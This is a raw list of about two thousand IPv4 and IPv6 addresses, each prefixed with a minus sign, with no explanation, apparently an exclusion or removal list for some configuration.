-139.196.167.85 -179.27.99.24 -72.251.210.23 -139.162.101.190 -74.50.49.89 -185.13.58.65 -1.226.200.174 -39.107.98.235 -192.172.250.220 -139.59.111.28 -46.97.9.181 -103.240.212.240 -195.8.206.141 -193.70.12.36 -71.19.249.116 -182.92.66.231 -103.240.213.146 -221.122.108.164 -89.208.156.102 -77.244.219.28 -173.193.30.178 -148.163.97.168 -50.22.198.215 -23.225.113.187 -37.187.61.52 -67.212.169.93 -34.245.42.3 -123.57.255.19 -103.249.106.139 -103.240.212.62 -120.79.8.139 -103.254.14.199 -109.73.235.13 -185.195.25.168 -195.123.212.8 -222.255.28.103 -122.9.235.201 -123.200.7.123 -118.193.235.79 -144.217.174.235 -37.59.80.183 -216.250.117.210 -160.16.108.230 -45.35.163.55 -142.91.95.249 -46.166.142.175 -78.47.131.26 -177.234.158.83 -107.178.147.125 -211.149.223.82 -115.238.244.86 -123.56.228.191 -2a0a:7d80:1:7::93:186 -80.233.244.65 -185.13.59.66 -88.198.140.146 -139.129.252.173 -45.76.249.107 -123.108.103.110 -104.224.202.172 -101.200.188.201 -103.218.3.161 -113.61.111.245 -107.187.199.118 -172.107.71.29 -45.118.248.11 -2a0a:7d80:1:7::97:30f -156.235.168.46 -93.189.36.242 -91.212.205.185 -162.242.254.10 -75.126.221.184 -103.240.214.73 -2a0a:7d80:1:9::99:90 -133.130.88.181 -103.240.212.12 -103.230.120.237 -149.202.7.51 -62.149.11.38 -153.120.0.67 -172.247.51.179 -149.202.80.19 -49.50.65.90 -45.77.248.68 -206.82.130.75 -220.162.237.213 -157.52.130.138 -103.230.120.247 -103.230.120.233 -64.207.178.107 -51.211.163.21 -103.100.157.166 -23.238.166.186 -23.238.166.176 -160.99.71.6 -209.160.50.129 -87.121.165.3 -103.240.215.127 -23.230.19.223 -23.19.22.45 -45.59.69.179 -92.42.38.22 -107.187.41.163 -218.61.30.222 -45.61.112.60 -188.165.226.106 -64.118.95.122 -45.79.98.101 -195.248.235.58 -95.128.131.190 -103.240.215.114 -202.153.34.252 -5.189.160.220 -115.28.111.20 -174.137.135.77 -112.121.188.253 -107.164.66.117 -103.224.82.167 -149.12.209.20 -103.91.126.26 -134.119.23.202 -133.242.87.156 -133.18.24.23 -186.202.116.116 -198.211.98.45 -122.9.22.152 -88.85.82.54 -104.203.82.221 -176.31.96.224 -103.240.215.121 -69.16.237.20 -157.52.240.82 -216.17.109.117 -5.135.4.59 -120.76.242.160 -60.216.101.45 -54.76.184.130 -2a00:16d8:2:402:225:64ff:fe3a:be76 -104.148.75.212 -104.238.236.115 -103.240.214.87 -39.106.33.155 -23.111.139.236 -45.56.114.25 -109.169.86.212 -188.120.238.167 -103.213.251.98 -2a0a:7d80:1:7::104:10d -216.227.134.18 -185.144.238.6 -65.60.5.118 -61.19.77.61 -212.83.178.28 -113.107.188.174 -5.45.72.86 -173.254.219.60 -45.76.155.36 -218.26.106.44 -116.204.104.73 -82.208.6.72 -122.9.229.187 -133.130.101.48 -139.199.71.253 -139.162.121.13 -45.32.111.59 -67.228.175.238 -113.10.181.119 -2a0a:7d80:1:7::93:10f -159.65.200.38 -128.199.68.139 -219.136.240.202 -150.95.129.72 -194.145.208.155 -192.162.112.12 -185.67.44.188 -216.252.212.143 -103.23.79.189 -172.247.51.241 -77.222.43.208 -103.205.1.88 -103.249.106.138 -45.35.163.148 -103.12.51.51 -125.74.200.253 -38.128.113.58 -192.138.210.195 -182.160.156.3 -137.74.114.24 -91.198.44.25 -69.4.98.196 -219.151.1.80 -175.25.17.133 -23.111.164.86 -23.111.164.5 -185.180.196.74 -185.191.197.25 -39.107.58.197 -192.187.120.236 -120.25.246.65 -103.240.212.131 -51.15.64.54 -45.64.135.231 -62.63.157.141 -91.250.87.20 -212.3.148.194 -89.33.247.17 -104.168.87.3 -61.142.208.67 -192.99.78.142 -155.94.69.201 -103.240.215.33 -2600:3c01::f03c:91ff:fe73:5b53 -210.33.29.62 -45.35.163.77 -47.90.64.68 -1.226.200.182 -172.246.220.156 -23.110.47.214 -50.22.44.114 -103.213.251.125 -104.149.66.184 -185.183.98.215 -208.43.222.96 -190.111.124.41 -111.202.15.26 -120.25.57.39 -152.249.244.101 -14.225.2.112 -128.199.249.221 -149.202.197.54 -172.255.159.245 -45.35.163.62 -23.239.5.10 -114.67.226.107 -172.246.196.83 -2a0a:7d80:1:9::99:1b6 -198.200.41.54 -87.230.54.172 -107.164.66.103 -120.25.157.124 -62.209.193.70 -101.37.15.128 -218.244.131.125 -201.144.177.59 -89.35.28.26 -156.235.172.82 -166.63.21.82 -122.224.196.91 -103.240.213.143 -74.86.253.118 -5.135.230.10 -114.215.238.53 -2a01:4f8:110:5048::2 -80.209.235.229 -94.103.34.42 -175.125.21.46 -157.52.240.87 -136.0.69.4 -195.225.105.36 -197.211.215.2 -159.89.199.98 -67.238.96.199 -54.153.236.249 -103.198.45.28 -139.199.30.136 -185.128.41.146 -119.147.42.165 -47.91.45.237 -67.229.73.97 -113.196.233.235 -202.177.221.58 -69.164.196.167 -45.76.148.182 -172.252.10.83 -182.16.57.77 -107.150.58.158 -103.100.157.204 -74.206.184.234 -109.73.168.222 -103.74.121.177 -208.167.225.252 -91.90.255.165 -114.119.11.135 -172.246.220.33 -80.233.244.66 -114.119.4.148 -47.94.3.21 -23.95.113.113 -178.33.15.85 -34.231.213.105 -74.124.196.177 -2605:6280:1:d::31 -192.227.243.130 -52.12.149.77 -104.202.185.162 -112.124.126.12 -117.158.204.36 -23.247.10.188 -183.178.12.46 -182.16.24.125 -81.91.84.29 -185.38.45.98 -2a0a:7d80:1:7::96:103 -103.10.170.13 -2a0a:7d80:1:9::98:e3 -195.85.214.11 -86.104.177.31 -23.225.145.173 -121.199.40.162 -193.142.158.115 -173.192.48.42 -123.57.62.197 -202.43.191.189 -67.196.126.253 -2606:1880:3:11::5 -118.145.20.32 -120.26.202.42 -149.12.208.169 -194.19.246.45 -192.99.230.45 -65.60.5.122 -103.15.51.52 -42.96.164.110 -2600:3c01::f03c:91ff:fe70:c48b -198.143.189.206 -121.14.31.58 -103.28.36.64 -192.99.93.178 -112.109.90.9 -168.194.69.90 -122.10.3.222 -91.142.220.18 -69.36.182.27 -121.201.16.213 -45.76.153.243 -2a0a:7d80:1:7::105:c1 -103.23.79.188 -194.58.122.85 -114.215.237.143 -223.27.48.8 -172.246.196.216 -43.251.97.60 -23.238.166.164 -113.212.162.148 -198.50.194.77 -152.118.76.5 -122.9.29.205 -62.149.25.14 -113.61.111.250 -109.254.248.77 -45.61.112.17 -163.53.19.242 -85.14.21.147 -23.238.145.97 -142.91.241.107 -123.207.239.21 -45.77.178.236 -67.225.189.106 -103.80.238.151 -72.3.197.229 -103.240.213.61 -118.184.0.132 -223.255.242.45 -82.145.240.91 -69.30.229.30 -104.238.86.157 -159.89.198.50 -104.202.185.73 -103.6.223.117 -114.215.199.108 -137.74.154.104 -103.246.153.176 -198.23.173.158 -210.209.89.49 -200.62.221.233 -120.26.83.38 -101.251.111.2 -193.233.150.101 -88.150.157.142 -103.240.215.103 -2605:6280:1:d::32 -212.47.244.36 -172.255.159.209 -194.110.129.8 -175.122.253.16 -192.190.87.150 -77.77.149.27 -91.240.86.203 -91.142.211.109 -198.200.41.29 -173.252.197.117 -202.163.104.119 -162.243.203.207 -37.97.167.22 -45.41.92.137 -188.226.201.211 -64.150.161.240 -45.35.99.166 -101.200.215.182 -2a0a:7d80:1:7::102:246 -94.242.231.235 -103.15.217.146 -66.254.177.68 -60.29.68.97 -37.59.149.215 -35.185.159.48 -85.185.91.201 -107.187.41.48 -142.91.95.47 -172.255.173.156 -182.73.231.242 -36.66.156.70 -45.114.94.72 -185.27.134.73 -112.121.188.251 -184.164.139.21 -185.87.50.95 -122.175.46.113 -54.68.220.161 -78.129.251.64 -118.190.92.75 -72.1.245.46 -2600:3c00::f03c:91ff:fe89:a9e3 -83.223.106.241 -188.68.243.185 -45.115.39.24 -133.242.228.245 -87.230.54.182 -172.110.18.243 -61.8.43.115 -62.213.100.227 -120.55.60.30 -23.224.115.20 -209.142.66.206 -45.77.179.73 -5.135.164.36 -45.116.173.159 -156.235.171.41 -104.232.75.169 -139.129.206.224 -2600:3c03::f03c:91ff:fe93:9b33 -171.111.153.152 -199.4.190.15 -47.94.153.232 -103.240.214.177 -103.12.51.28 -185.13.56.205 -103.240.212.82 -39.108.64.242 -142.91.239.96 -195.2.253.194 -183.81.161.32 -172.247.51.245 -80.77.81.175 -211.101.11.149 -62.213.100.222 -86.109.170.24 -120.27.7.93 -172.247.51.166 -162.220.59.43 -172.247.51.170 -122.9.235.225 -188.166.232.91 -142.0.128.233 -104.224.200.246 -185.12.111.57 -45.35.163.16 -120.25.2.219 -178.32.80.188 -122.114.46.139 -23.244.241.239 -103.240.215.53 -106.120.153.224 -156.237.177.176 -107.178.150.78 -45.33.74.145 -2600:3c01::f03c:91ff:fe73:9af1 -107.187.41.60 -116.19.92.124 -2600:3c01::f03c:91ff:fe73:988 -52.79.208.31 -166.62.99.32 -2a01:7e00::f03c:91ff:fe70:25b4 -159.8.44.75 -157.52.240.80 -185.78.64.117 -172.247.51.45 -103.240.212.236 -113.196.233.131 -23.230.19.88 -62.210.108.179 -43.229.39.215 -45.79.191.183 -162.243.240.243 -45.77.128.27 -103.48.171.189 -94.23.6.194 -85.206.175.192 -2a0a:7d80:1:7::100:12e -31.45.234.83 -65.18.120.28 -182.16.121.70 -172.106.187.214 -173.193.159.122 -198.23.239.81 -142.91.95.197 -103.86.141.229 -43.247.68.44 -58.216.139.60 -192.186.175.91 -62.63.191.38 -209.53.155.209 -172.104.5.74 -50.30.38.237 -107.187.201.125 -109.197.120.8 -202.171.225.148 -139.99.104.84 -172.104.19.110 -82.96.149.156 -71.19.249.100 -5.178.109.202 -116.55.228.246 -115.236.27.214 -5.196.207.190 -58.68.65.231 -2600:3c00::f03c:91ff:fe73:f2ed -176.31.36.198 -47.92.71.190 -201.49.21.51 -2a0a:7d80:1:7::92:2b7 -37.187.24.187 -156.235.170.102 -103.63.212.142 -23.225.0.62 -183.60.233.200 -167.249.9.178 -202.146.208.177 -122.114.90.178 -31.24.154.100 -85.254.126.84 -118.89.103.190 -172.107.71.24 -104.203.82.204 -23.225.89.120 -84.246.210.96 -172.247.51.159 -2600:3c00::f03c:91ff:fe84:b709 -23.244.241.194 -104.202.185.202 -204.11.233.146 -133.130.117.180 -54.88.108.140 -91.227.16.58 -103.12.49.57 -159.203.53.206 -172.255.173.229 -142.4.206.175 -37.59.210.64 -121.40.142.3 -117.120.50.182 -119.23.68.48 -157.52.240.84 -116.196.123.123 -120.25.62.31 -61.193.176.17 -185.107.66.30 -192.71.230.65 -60.21.200.245 -103.240.215.57 -106.75.20.41 -45.32.60.153 -5.196.6.5 -124.133.232.149 -98.126.29.4 -47.88.191.88 -107.150.52.253 -34.230.125.52 -2600:3c03::f03c:91ff:fe69:10de -37.187.248.115 -31.207.87.174 -209.152.163.44 -194.19.246.125 -122.10.3.218 -66.171.238.172 -23.234.26.132 -94.23.177.29 -120.77.245.140 -103.205.0.116 -185.126.247.14 -187.58.57.235 -178.239.183.35 -188.93.11.173 -188.165.11.210 -176.119.31.29 -216.17.108.199 -103.240.212.223 -119.38.137.137 -120.55.86.104 -103.12.50.30 -2600:3c03::f03c:91ff:fe61:1fdf -71.6.151.2 -47.93.161.51 -153.128.38.10 -14.0.85.18 -192.241.244.76 -115.159.30.229 -216.106.96.92 -119.23.13.240 -178.32.6.24 -23.238.129.68 -210.59.244.11 -122.156.216.54 -199.195.116.2 -192.155.227.77 -77.77.149.24 -104.203.82.197 -37.153.111.72 -121.196.221.196 -47.92.36.21 -172.246.196.181 -185.223.95.143 -23.225.0.151 -189.125.96.177 -31.169.92.142 -2a0a:7d80:1:7::102:11a -195.2.139.11 -2a0a:7d80:1:7::94:53 -31.192.208.210 -210.1.60.242 -211.149.197.127 -2a0a:7d80:1:9::99:ef -210.56.55.173 -202.84.36.146 -47.206.104.135 -2a0a:7d80:1:7::106:61 -172.107.64.5 -23.92.25.196 -109.199.116.65 -185.4.67.33 -193.235.34.83 -122.114.43.108 -108.59.13.1 -87.252.5.56 -37.59.110.40 -217.13.93.130 -121.41.34.123 -47.94.143.160 -182.92.7.71 -82.102.11.129 -186.226.184.5 -2600:3c00::f03c:91ff:feae:6689 -188.132.190.30 -122.9.29.233 -205.251.138.119 -205.251.138.119 -172.104.17.234 -35.163.224.155 -31.172.81.44 -103.205.3.66 -103.205.3.121 -60.205.148.96 -103.240.212.106 -116.62.140.215 -101.207.224.207 -216.106.96.93 -216.92.239.131 -188.214.30.151 -107.181.251.138 -123.56.193.5 -62.63.190.19 -54.201.141.158 -45.117.83.23 -45.35.163.104 -101.201.222.132 -2001:ba8:1f1:f019::80 -69.61.64.164 -45.77.46.177 -198.199.69.194 -80.233.244.17 -173.0.63.126 -172.252.10.132 -167.114.63.103 -158.69.131.216 -199.15.206.32 -95.183.198.13 -23.244.241.185 -142.91.95.231 -122.195.200.230 -43.252.169.9 -120.26.106.221 -156.235.171.48 -192.186.129.44 -82.202.231.61 -118.190.74.12 -185.91.108.183 -107.187.41.136 -5.196.204.113 -2600:3c03::f03c:91ff:fe69:90fe -109.123.222.132 -103.74.121.171 -103.240.215.44 -103.27.179.61 -91.237.109.46 -54.193.188.193 -103.78.103.59 -63.142.251.236 -122.9.18.185 -202.92.200.74 -120.31.129.74 -80.233.244.87 -37.18.74.78 -185.13.59.132 -103.205.1.102 -5.45.76.14 -23.110.47.240 -82.98.162.240 -139.162.20.207 -159.89.196.124 -172.247.51.234 -2a0a:7d80:1:7::107:e9 -129.236.21.143 -5.178.109.134 -198.50.138.132 -95.128.131.186 -69.50.200.109 -139.59.250.144 -163.172.20.25 -83.149.224.209 -23.253.83.63 -62.197.191.206 -125.253.127.199 -119.81.19.221 -106.14.9.188 -118.190.101.226 -185.13.56.192 -122.227.58.117 -46.41.151.203 -103.30.84.156 -2600:3c00::f03c:91ff:fe6e:a92c -172.252.10.155 -104.196.198.63 -172.107.71.26 -107.178.162.73 -123.60.202.223 -172.247.51.153 -104.202.185.149 -89.107.129.99 -86.104.177.7 -185.18.226.111 -62.63.157.153 -107.181.251.135 -173.193.149.114 -45.42.94.176 -85.204.96.219 -82.135.151.2 -112.12.67.115 -23.224.115.50 -193.204.114.63 -81.171.34.67 -217.182.101.253 -185.191.197.84 -103.240.212.112 -46.105.180.218 -122.9.29.251 -217.20.131.105 -94.228.216.197 -195.135.236.19 -158.255.5.219 -107.178.147.113 -45.79.148.14 -103.74.121.161 -87.98.244.55 -142.4.107.66 -104.203.82.200 -159.89.41.40 -123.31.29.149 -121.40.222.28 -69.175.18.46 -37.59.150.210 -62.63.190.40 -172.106.187.212 -95.85.56.204 -80.233.244.28 -138.197.91.42 -5.175.42.42 -137.74.33.164 -107.164.66.136 -69.175.121.219 -2600:3c00::f03c:91ff:fe26:3a14 -37.59.168.143 -136.0.69.45 -107.187.201.104 -103.240.212.180 -2a0a:7d80:1:7::105:ba -203.160.62.26 -194.145.180.54 -77.75.98.5 -5.135.68.207 -37.58.96.71 -58.82.167.8 -42.96.177.100 -82.135.151.100 -81.95.119.144 -156.237.179.125 -103.198.45.43 -50.22.198.208 -139.196.180.121 -162.242.211.245 -93.171.222.73 -103.48.82.25 -45.56.112.181 -123.200.7.124 -2a0a:7d80:1:7::94:112 -185.29.122.109 -67.229.72.80 -158.69.187.244 -23.104.135.114 -72.249.108.19 -159.89.195.172 -207.74.192.152 -139.196.235.76 -2600:3c02::f03c:91ff:fe73:11bc -123.57.148.253 -45.77.242.190 -80.233.244.15 -115.29.206.148 -45.35.163.140 -180.153.24.45 -173.236.111.167 -185.13.56.64 -37.26.160.87 -142.44.201.222 -103.48.81.33 -209.208.62.118 -120.27.106.94 -68.232.185.78 -110.164.71.179 -156.237.178.155 -52.74.218.203 -120.77.40.216 -77.132.232.98 -162.218.54.70 -2600:3c00::f03c:91ff:fe70:42f -222.255.28.107 -103.240.213.206 -114.112.49.45 -115.159.31.70 -2a0a:7d80:1:7::96:1a0 -221.13.74.10 -65.49.9.78 -202.102.89.248 -222.255.123.11 -163.172.73.120 -80.233.141.202 -103.100.157.36 -137.74.90.67 -80.77.95.14 -5.77.56.50 -172.246.196.191 -2600:3c00::f03c:91ff:fe50:7e4d -192.64.78.117 -103.100.157.218 -158.69.36.19 -150.95.172.160 -179.190.47.164 -41.185.28.220 -192.198.112.244 -38.123.201.70 -183.238.156.211 -104.224.198.163 -202.153.178.202 -103.24.93.133 -150.95.174.145 -94.130.51.18 -54.228.217.214 -192.122.200.15 -2a01:4f8:140:3405::2 -122.165.152.242 -2600:3c02::f03c:91ff:fe61:fa0f -103.198.45.53 -185.10.230.121 -115.29.176.93 -185.27.134.96 -144.217.147.112 -23.229.4.39 -216.106.96.78 -185.11.247.38 -155.94.69.212 -77.75.37.69 -192.122.200.51 -114.67.236.9 -178.33.27.124 -2600:3c03::f03c:91ff:fef1:cfbb -47.52.3.18 -23.224.115.224 -39.107.80.101 -117.89.172.188 -110.10.40.248 -59.160.116.186 -80.233.244.72 -121.40.152.75 -111.205.210.24 -2600:3c00::f03c:91ff:fe26:8432 -202.9.100.141 -104.225.220.114 -192.186.175.84 -107.178.150.75 -209.53.155.202 -46.182.76.31 -2600:3c00::f03c:91ff:fe50:3e4b -198.50.199.242 -23.225.0.228 -54.80.230.19 -47.88.33.38 -47.52.4.230 -110.4.42.59 -2600:3c00::f03c:91ff:fe73:edbc -125.6.162.149 -104.149.66.151 -45.33.48.106 -156.237.177.175 -133.18.4.189 -156.67.218.119 -5.178.109.232 -2a0a:7d80:1:7::100:30b -116.66.166.58 -120.55.70.28 -2a0a:7d80:1:7::100:186 -50.62.30.241 -185.27.134.118 -172.246.196.148 -45.117.82.107 -138.121.97.53 -157.252.245.28 -103.48.80.168 -50.116.52.83 -75.126.40.166 -118.200.204.200 -115.29.9.75 -93.180.67.12 -206.198.243.145 -192.122.200.246 -185.20.226.239 -192.133.45.201 -103.240.214.43 -182.92.81.176 -198.128.151.19 -69.50.209.195 -112.74.198.19 -91.237.109.35 -2600:3c02::f03c:91ff:feae:4e17 -200.145.221.4 -2600:3c00::f03c:91ff:fe89:7a9d -193.136.231.5 -212.48.97.230 -5.39.186.199 -103.252.21.112 -58.82.167.63 -60.12.147.108 -69.16.215.215 -177.93.110.10 -123.30.189.237 -213.99.41.19 -47.93.192.230 -160.16.215.25 -139.129.111.153 -212.244.1.8 -200.216.165.114 -101.255.92.226 -2a0a:7d80:1:7::93:1b2 -2400:8901::f03c:91ff:fe39:e829 -103.232.66.211 -119.60.0.155 -23.225.113.27 -103.48.82.24 -5.8.32.15 -142.91.239.102 -37.143.8.250 -2600:3c01::f03c:91ff:fe50:d3ee -139.162.1.52 -87.123.119.212 -216.45.51.149 -2600:3c00::f03c:91ff:fe26:d2f4 -103.12.51.40 -43.255.123.84 -118.31.66.231 -120.77.53.64 -82.196.3.98 -139.162.9.112 -121.42.54.175 -201.49.21.195 -125.253.127.154 -188.68.240.177 -123.31.29.79 -2600:3c00::f03c:91ff:fe6e:fc0e -182.18.146.14 -103.48.82.22 -2a0a:7d80:1:7::92:146 -27.50.80.93 -103.28.219.128 -167.88.123.6 -174.142.250.228 -184.173.138.236 -119.29.40.74 -211.149.237.161 -121.40.115.56 -80.233.244.69 -63.142.250.31 -39.108.245.50 -2600:3c03::f03c:91ff:fe69:14c1 -47.52.145.191 -177.125.27.98 -192.121.177.174 -185.17.181.167 -95.85.60.11 -46.166.129.205 -2600:3c03::f03c:91ff:fe93:8000 -103.12.50.9 -171.244.14.177 -108.168.174.98 -119.81.5.169 -23.235.234.22 -54.244.249.121 -43.230.142.16 -79.170.88.194 -139.199.190.251 -2a0a:7d80:1:9::98:211 -92.222.81.93 -122.9.29.236 -118.193.209.196 -186.118.161.67 -87.252.252.213 -2600:3c01::f03c:91ff:fe50:5274 -2600:3c03::f03c:91ff:fe69:79b -168.63.27.197 -45.64.169.67 -173.231.111.30 -46.101.225.181 -159.253.39.164 -2600:3c03::f03c:91ff:fe69:12e4 -23.110.56.96 -94.101.82.245 -198.200.41.123 -216.106.96.73 -23.224.115.120 -192.96.206.232 -47.93.191.50 -35.161.121.95 -199.102.46.201 -180.101.45.219 -103.240.213.209 -92.222.246.20 -5.196.196.171 -62.138.137.111 -62.138.137.111 -54.92.59.192 -2600:3c00::f03c:91ff:fe70:6f00 -211.167.76.180 -192.186.129.37 -2600:3c03::f03c:91ff:fe69:a6ea -103.198.45.61 -128.199.104.50 -23.20.27.155 -114.242.86.68 -49.212.80.172 -222.187.223.130 -2600:3c01::f03c:91ff:fe50:7b53 -5.39.64.38 -185.5.53.232 -59.110.136.38 -2600:3c00::f03c:91ff:fe18:bb93 -2a0a:7d80:1:7::106:22a -2600:3c00::f03c:91ff:fe6e:167c -185.128.113.99 -200.62.3.44 -185.73.91.19 -164.132.195.140 -109.73.168.203 -37.247.116.147 -188.226.181.165 -119.23.175.21 -54.38.59.102 -45.77.117.223 -66.70.214.242 -93.115.137.227 -47.92.97.220 -103.234.98.11 -2600:3c03::f03c:91ff:fe61:a95f -178.33.139.250 -188.213.22.151 -65.17.131.86 -70.36.125.49 -113.88.138.74 -195.182.132.49 -2a0a:7d80:1:7::100:94 -2600:3c03::f03c:91ff:fe61:a39d -216.33.215.20 -185.124.84.169 -153.36.240.251 -104.232.75.139 -2600:3c00::f03c:91ff:fe6e:dda0 -2600:3c00::f03c:91ff:fe3b:ed32 -111.198.128.126 -221.195.83.228 -134.119.150.80 -103.240.215.122 -23.225.0.172 -2600:3c03::f03c:91ff:fe61:1455 -156.237.179.112 -52.221.239.27 -133.242.187.235 -172.247.51.155 -172.246.196.58 -166.63.21.101 -133.130.121.249 -177.93.111.242 -136.243.67.156 -104.128.228.235 -144.217.69.22 -43.241.37.183 -2600:3c01::f03c:91ff:fe73:ed9e -64.140.170.10 -2a0a:7d80:1:7::95:2a2 -91.134.151.83 -37.113.131.223 -207.154.70.32 -39.106.151.108 -139.99.113.233 -60.188.231.121 -79.133.162.92 -218.246.196.41 -216.218.193.148 -85.9.66.22 -216.17.111.227 -120.76.125.61 -23.238.166.160 -103.240.213.173 -178.33.201.210 -188.166.17.154 -42.117.2.206 -91.215.137.110 -128.199.167.113 -149.56.179.20 -190.153.244.238 -120.92.237.102 -188.120.238.137 -121.40.22.149 -103.242.106.121 -2a01:7e00::f03c:91ff:fe50:db3f -119.81.31.162 -45.40.160.109 -188.210.220.97 -172.255.173.207 -2600:3c03::f03c:91ff:fea1:65f7 -95.85.3.70 -123.57.48.153 -200.29.176.125 -36.74.70.73 -65.60.5.79 -146.185.166.18 -185.200.229.7 -202.90.195.35 -103.100.157.3 -193.70.85.211 -93.115.31.53 -103.28.38.72 -134.119.170.13 -93.190.138.175 -2a0a:7d80:1:7::92:f3 -103.100.157.110 -124.248.207.170 -114.215.159.118 -123.206.115.155 -104.203.82.82 -142.54.185.163 -171.113.120.123 -23.225.89.66 -182.255.0.67 -112.121.179.53 -107.187.41.122 -54.248.0.23 -185.82.114.200 -47.91.149.99 -107.180.79.218 -23.19.238.51 -67.227.142.21 -159.148.20.103 -183.61.83.156 -156.235.172.69 -112.121.184.211 -184.107.230.77 -47.104.150.130 -23.225.113.107 -45.124.85.114 -172.104.109.183 -23.225.89.199 -104.251.216.36 -103.240.212.191 -122.224.158.242 -182.92.97.247 -115.28.72.47 -13.59.174.28 -36.250.0.169 -208.94.238.41 -198.200.41.84 -138.201.78.8 -172.106.187.237 -160.16.77.79 -54.241.78.228 -112.78.10.78 -13.115.3.25 -107.186.35.18 -58.216.238.25 -213.138.116.238 -159.203.161.69 -64.6.98.10 -120.92.230.204 -144.217.16.97 -23.92.77.84 -66.171.236.153 -95.213.136.102 -156.235.171.151 -112.175.17.187 -43.229.155.149 -172.246.196.56 -151.69.124.246 -78.111.82.110 -62.213.100.251 -58.20.232.251 -177.52.183.194 -37.59.33.232 -5.39.219.81 -137.74.35.46 -118.190.146.103 -50.28.37.124 -45.63.99.2 -107.186.35.101 -185.13.58.216 -180.124.235.88 -51.254.90.76 -104.37.212.116 -114.4.133.70 -168.235.108.106 -68.65.123.9 -198.235.132.66 -132.148.138.184 -223.223.178.17 -112.65.140.133 -122.9.235.231 -47.92.0.236 -67.222.133.248 -199.68.182.163 -23.104.135.40 -104.237.6.112 -46.4.105.107 -106.14.154.64 -68.232.185.94 -176.31.212.196 -222.168.151.133 -37.187.77.131 -180.250.214.5 -119.134.251.51 -112.74.49.64 -139.59.126.146 -203.195.194.105 -51.254.80.252 -138.197.165.232 -59.188.232.77 -45.79.7.141 -60.12.147.84 -172.106.187.236 -174.37.231.145 -80.79.119.202 -103.240.212.147 -116.62.225.100 -2a0a:7d80:1:7::96:4f -82.196.13.146 -150.95.184.111 -172.246.220.81 -149.154.70.90 -108.61.158.240 -2600:3c03::f03c:91ff:fee0:a672 -133.130.91.82 -181.65.232.126 -45.35.102.178 -209.205.219.100 -27.0.12.152 -2600:3c00::f03c:91ff:fe55:9e84 -104.202.185.247 -122.9.29.250 -78.129.251.134 -103.13.241.227 -115.29.36.186 -2a0a:7d80:1:9::99:46 -45.55.63.139 -45.114.94.10 -134.119.59.160 -156.235.170.98 -74.205.86.209 -195.181.214.201 -211.151.74.174 -62.90.37.16 -190.47.67.177 -171.13.177.195 -208.38.172.55 -121.41.37.31 -139.196.144.176 -192.81.134.77 -23.19.238.8 -139.162.208.101 -193.203.61.7 -108.170.59.205 -101.200.131.205 -103.200.5.127 -104.206.241.63 -121.40.215.232 -23.111.25.251 -122.114.129.156 -2a0a:7d80:1:7::97:2e3 -122.192.218.82 -172.247.51.202 -81.4.107.8 -98.126.202.131 -182.16.107.198 -124.243.223.25 -220.181.86.14 -220.181.86.51 -113.10.180.166 -192.99.190.171 -192.241.188.96 -112.121.162.75 -61.148.202.166 -218.15.113.216 -183.149.67.190 -188.125.236.132 -107.178.147.103 -159.203.170.253 -107.6.221.121 -120.25.231.63 -120.27.128.247 -139.199.15.92 -2a0a:7d80:1:9::99:e8 -41.186.40.7 -146.185.153.180 -198.176.52.177 -23.249.168.131 -5.196.196.175 -112.121.174.124 -69.46.0.180 -66.63.171.148 -158.69.226.208 -168.205.224.6 -46.39.160.21 -103.100.157.125 -172.247.51.169 -220.112.36.13 -2001:bc8:300e:101::1 -133.130.107.36 -49.212.158.143 -77.252.121.2 -101.200.228.26 -37.48.64.67 -123.57.216.85 -66.85.158.109 -188.128.26.195 -2a0a:7d80:1:7::97:220 -109.169.67.2 -172.246.196.37 -136.0.56.107 -122.9.18.183 -2600:3c03::f03c:91ff:fe2c:a165 -188.165.230.26 -120.76.20.192 -219.132.199.42 -195.8.206.131 -174.138.22.196 -45.77.238.170 -35.185.128.134 -69.65.56.180 -66.55.156.134 -184.173.127.14 -35.185.189.72 -213.241.240.27 -210.59.244.34 -123.157.150.39 -150.95.141.14 -161.47.83.240 -121.40.176.174 -47.93.17.104 -80.233.244.59 -182.18.146.13 -111.202.15.47 -210.51.163.191 -153.122.9.42 -188.166.34.89 -217.78.203.87 -212.68.57.121 -23.89.142.252 -118.89.61.211 -103.240.215.123 -180.178.62.3 -114.215.152.65 -119.81.177.102 -172.107.75.205 -92.222.171.126 -23.238.166.166 -172.246.196.171 -139.129.56.200 -172.246.196.182 -103.75.46.110 -103.79.76.237 -182.16.121.198 -185.149.101.44 -91.194.60.127 -81.95.146.52 -198.23.88.82 -182.163.126.245 -113.98.254.184 -202.153.178.198 -158.69.36.15 -67.196.126.246 -101.201.239.151 -134.119.147.26 -185.63.190.146 -199.188.104.1 -128.199.226.72 -202.106.90.21 -115.42.217.243 -103.12.49.46 -199.33.125.91 -172.107.64.31 -172.255.173.168 -138.197.27.57 -72.47.235.224 -95.163.100.216 -172.104.36.164 -5.196.51.214 -211.149.188.94 -2a0a:7d80:1:7::105:20 -172.255.173.254 -178.18.196.148 -38.123.253.91 -85.254.126.74 -188.227.228.3 -150.95.184.160 -119.6.241.200 -178.132.2.47 -121.42.57.133 -200.105.178.130 -61.43.211.171 -59.76.156.67 -113.196.233.195 -115.231.219.81 -165.227.99.98 -159.8.24.131 -172.246.220.108 -76.9.2.150 -149.56.229.103 -49.212.161.228 -122.9.229.190 -169.48.65.133 -37.59.160.55 -2a0a:7d80:1:9::98:1a0 -202.82.21.35 -185.191.228.200 -23.238.166.169 -108.61.220.235 -109.203.103.208 -195.154.32.79 -217.182.52.86 -95.85.3.210 -182.92.67.236 -122.9.163.226 -204.93.61.185 -119.29.87.30 -2a0a:7d80:1:9::98:27f -206.82.195.44 -2a0a:7d80:1:7::101:7a -86.219.11.22 -85.159.235.48 -120.31.129.85 -211.152.53.231 -58.222.198.30 -103.198.45.9 -72.1.245.67 -91.121.247.83 -121.40.72.138 -23.250.28.8 -175.41.243.203 -165.227.66.0 -114.55.7.190 -103.74.116.194 -112.126.78.191 -39.108.50.144 -114.55.144.85 -159.8.28.234 -121.41.104.75 -182.253.111.39 -50.235.147.27 -199.231.187.16 -103.212.33.197 -54.94.191.155 -2a0a:7d80:1:7::101:e8 -176.221.37.84 -121.40.81.65 -93.187.201.63 -212.129.11.230 -190.6.96.134 -104.202.185.40 -213.238.161.51 -178.63.93.59 -2a01:7e00::f03c:91ff:fe50:ad4d -5.39.217.194 -192.69.219.11 -62.216.33.80 -144.168.72.142 -166.63.21.39 -38.130.75.7 -108.61.196.101 -98.124.177.134 -2a0a:7d80:1:7::96:366 -107.187.41.57 -45.63.91.72 -106.14.249.207 -216.92.98.51 -125.253.127.193 -88.198.32.172 -139.162.190.141 -117.121.97.117 -107.179.102.210 -197.232.56.96 -172.107.146.160 -119.29.145.161 -103.70.72.15 